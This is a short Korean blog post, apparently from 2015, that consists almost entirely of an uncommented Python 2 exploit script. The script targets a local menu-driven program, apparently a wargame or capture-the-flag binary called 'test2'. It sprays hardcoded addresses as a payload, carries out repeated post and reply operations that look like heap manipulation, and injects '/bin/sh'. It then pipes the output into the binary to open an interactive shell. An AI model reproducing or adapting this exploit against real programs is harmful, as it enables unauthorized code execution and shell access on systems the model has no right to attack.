익스플로잇

python 댓글

wakira 2015. 7. 1. 05:27

ff

test1






import sys


payload = "\xc4\x87\x04\x08" * 300 + "\x30\x86\x04\x08" * 300


for i in range(3):

sys.stdout.write("1\n")

sys.stdout.write("author\n")

sys.stdout.write("title\n")

sys.stdout.write(payload + "\n")


sys.stdout.write("2\n")

sys.stdout.write("2\n")


for i in range(0x80):

sys.stdout.write("3\n")

sys.stdout.write("reply\n")


sys.stdout.write("1\n")

sys.stdout.write("4\n")


for i in range(2):

sys.stdout.write("1\n")

sys.stdout.write("author\n")

sys.stdout.write("title\n")

sys.stdout.write("content\n")


sys.stdout.write("2\n")

sys.stdout.write("4\n")


sys.stdout.write("2\n")

sys.stdout.write("author\n")

sys.stdout.write("title\n")


for i in range( 0x80):

sys.stdout.write("3\n")

sys.stdout.write("/bin/sh\n")


sys.stdout.write("1\n")


sys.stdout.write("4\n")

sys.stdout.write("3\n")




(python ex.py ; cat) | ./test2






Python 2.7.5+ (default, Sep 19 2013, 13:49:51) 

[GCC 4.8.1] on linux2

Type "help", "copyright", "credits" or "license" for more information.

>>> 



저작자표시 비영리 동일조건 (새창열림)